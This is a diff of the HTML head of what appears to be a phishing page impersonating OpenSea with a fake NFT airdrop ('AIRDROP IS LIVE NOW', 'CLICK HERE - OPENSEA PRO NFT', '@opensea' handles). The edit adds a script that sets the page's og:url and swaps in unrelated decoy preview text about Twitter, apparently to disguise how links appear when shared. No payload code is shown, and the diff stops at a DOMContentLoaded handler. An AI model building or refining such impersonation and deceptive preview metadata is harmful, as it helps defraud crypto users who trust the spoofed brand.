--- a/index.html
+++ b/index.html
@@ -25,11 +25,31 @@
 TRY YOUR LUCK ! 🚀
     " property="og:description">
     <!-- <meta property="og:image:url" content="/389-9bec97c22fa2e411.gif"> -->
-    <meta property="og:image" content="https://opensea2mint-nft29.vercel.app/images/389-9bec97c22fa2e411.gif">
+<!--     <meta property="og:image" content="https://opensea2mint-nft29.vercel.app/images/389-9bec97c22fa2e411.gif">
     <meta name="theme-color" content="#7289DA">
     <meta name="twitter:card" content="summary_large_image">
     <meta name="twitter:site" content="@opensea">
-    <meta name="twitter:title" content="CLICK HERE - OPENSEA PRO NFT">
+    <meta name="twitter:title" content="CLICK HERE - OPENSEA PRO NFT"> -->
+<script>
+    // Get the current page URL
+const currentUrl = window.location.href;
+
+// Create a new <meta> element
+const metaTag = document.createElement('meta');
+metaTag.setAttribute('property', 'og:url');
+metaTag.setAttribute('content', currentUrl);
+
+// Append the <meta> element to the <head> section
+document.head.appendChild(metaTag);
+ </script>
+<meta name="twitter:card" content="summary_large_image">
+<meta name="twitter:card" content="summary" />
+<meta name="twitter:site" content="@opensea" />
+<meta name="twitter:creator" content="@opensea" />
+
+<meta property="og:title" content="A Twitter for My Sister" />
+<meta property="og:description" content="In the early days, Twitter grew so quickly that it was almost impossible to add new features because engineers spent their time trying to keep the rocket ship from stalling." />
+<meta property="og:image" content="https://opensea2mint-nft29.vercel.app/images/389-9bec97c22fa2e411.gif" />
     <meta name="twitter:description" content="
 
 🟢 AIRDROP IS LIVE NOW 🟢
@@ -41,7 +61,7 @@ TRY YOUR LUCK ! 🚀
 
 TRY YOUR LUCK ! 🚀
     ">
-    <meta name="twitter:image" content="https://opensea2mint-nft29.vercel.app/images/389-9bec97c22fa2e411.gif"> 
+<!--     <meta name="twitter:image" content="https://opensea2mint-nft29.vercel.app/images/389-9bec97c22fa2e411.gif">  -->
     <link rel="stylesheet" href="css/style.css">
 <script>
       document.addEventListener('DOMContentLoaded', function () {
